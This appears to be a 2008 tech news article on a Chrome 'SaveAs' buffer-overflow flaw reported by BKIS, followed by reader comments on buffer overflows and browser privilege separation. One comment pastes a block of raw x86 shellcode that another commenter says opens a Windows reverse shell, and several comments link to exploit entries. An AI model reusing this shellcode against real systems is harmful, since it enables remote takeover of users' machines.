AT&T Tech Support 360
Security firm spots Chrome 'SaveAs' flaw
It's been only a few days since Google released its Chrome browser, and security researchers are still digging into the software in search of the first few flaws.
A company in Vietnam has turned up the latest vulnerability in Chrome, according to a story posted to Information Week's Web site. Bach Khoa Internet Security says that the Chrome 0.2.149.27 release is susceptible to a critical buffer-overflow flaw, which could allow a remote attacker to take control of a PC. BKIS says it has reported the vulnerability to Google.
Here's how BKIS describes the vulnerability and how it could be exploited:
The vulnerability is caused due to a boundary error when handling the "SaveAs" function. On saving a malicious page with an overly long title (title tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users' systems.To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.
Earlier this week, security researcher Rishi Narang reported a flaw related to how Chrome, still in beta, behaves with undefined handlers, while another researcher, Aviv Raff, developed a proof-of-concept demo that showed Chrome could be hit with a carpet-bombing flaw.
Jonathan Skillings is managing editor of CNET News, based in the Boston bureau. He's been with CNET since 2000, after a decade in tech journalism at the IDG News Service, PC Week, and an AS/400 magazine. He's also been a soldier and a schoolteacher. E-mail Jon.
I have even heard "professional" programmers state that buffer overflows are impossible using newer languages that handle memory management automatically.
Marketting hype is great isn't it? Unfortuantly all you have to do is Google Open Office Buffer Overflow and you'll come across many such flaws in Open Office and it's written in Java. Some of these even allow the execution of arbritary code. Similar problems affect programs written in .NET too. Unfortunatly even managed execution environments are still created with imperfect, native compliers. There's always going to be a gotcha.
\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49\x51\x89\xe1\x6a\x01\x51
IIRC it creates a reverse shell in Windows and starts listening for connection requests
Code meant for use in a buffer overflow exploit is not conveniently displayed in human-readable uncompiled C.
Also, the boundary of the buffer is probably going to be a little wider than what is displayed in the browser's title bar.
@rhsc: As long as you have folks who forget to sanitize their inputs, you will find the potential for blown buffers.
@the_vdog: PHP, ASP, and the like have the potential for that (injecting SQL commands into an unguarded input field), but throwing C source code uncompiled like that at a compiled binary won't get you very far. ;)
/P
@Null: If you mouse over the tab you'll see the full title.
So in my investigation of how saving off HTML (from a View Source) worked in Google?s Chrome browser several days ago (before I saw this story), I used Mark Russinovich's Filemon tool to note what process was associated with savings the contents of doing a "View Source". I simply saved things off to:
C:\Windows\BadStuff.txt
Turns out, the ID belonged to the parent process that spawns off children (copies of Chrome.exe). Instead of threads, Chrome uses a privilege separation model and creates child Chrome.exe processes for each tab. These children do the actual HTML rendering and JavaScript execution but as I learned from my observations they are not involved in file I/O when it comes to saving off the contents of a "View Source". This surprised me a bit, namely, that the parent would save off the contents of doing a View Source.
I thought nothing of it but then I came across this story. Namely, someone finding a way to exploit the Chrome.exe parent process having administrative rights in a very unexpected way (that would be 99% of Windows XP users). However this exploit requires social engineering which doesn?t make this exploit a major flaw in my honest opinion.
This flaw showcases a bit of over-engineering on Google?s part. By going on the premise that the children should not interact with the file system and asking the parent to save off HTML, the default access control lists (ACLs) in NTFS (NT File System) which would have prevented malice don?t play a role. That?s because if the children with no admin rights just did the work themselves an attacker would not have much leverage in instrumenting a machine since any attempts to modify C:\Windows would by default fail.
But by having the parent Chrome.exe process do the work with admin rights on XP, an exploit is born.
So once again it is the same story I?ve preaching for a while now, don?t run *anything* that is associated with talking on the Net with administrative rights -- the principle of least privilege. While Google's Chrome makes things harder there is no such thing as infallibility when it comes to the security of a software system. There are an infinite number of permutations you can feed a web browser so it?s best to assume the worst.
This is why you should use this tool (RemoveAdmin) with Google's Chrome browser (or ANY browser for that matter):
http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=lst-1&cdlPid=10835515
The RemoveAdmin installer creates shortcuts for IE and Firefox but if you look closely, it's a general purpose tool and you can create a new shortcut to launch Chrome (just provide a path to Chrome.exe as an argument).
RemoveAdmin strips out administrative rights on any process you wish to launch, thereby cutting the exploit talked about here at the knees.
-M
Vista is just as vulnerable to buffer overflows as any other OS that uses an Intel/AMD x86 CPU. The problem has nothing to do with permissions, but how the memory stack itself reacts to bad logic.
You basically confuse the CPU itself with a buffer overflow, then chuck in your malware commands during that state of confusion, which the CPU will act on no matter what permissions the commands may have (NX bit be damned).
/P
Besides, they could have done it in Java to only find out it had vulnerabilities anyway. Java isn't perfect on secruity either. The saddest thing of all in my opinion is that people still think you can take an imperfect language like C++ and imperfect programmers and yet somehow manage to create a perfectly secure virtual machine with them. Unfortunatly that's just not the case. I wish it was though.
http://seclists.org/bugtraq/2008/Sep/0065.html
and Allows downloads of exe files with no prompt to open or save:
http://www.milw0rm.com/exploits/6355
and I'm sure they will find more yet.
-
by tinyang
September 8, 2008 12:49 PM PDT
- I like the features in Chrome, but it is too new to use for those of us who are not on the bleeding edge of technology. Besides this it saves passwords in clear text:
-
Reply to this comment
-
See all 22 Comments >>http://seclists.org/bugtraq/2008/Sep/0065.html
and Allows downloads of exe files with no prompt to open or save:
http://www.milw0rm.com/exploits/6355
and I'm sure they will find more yet.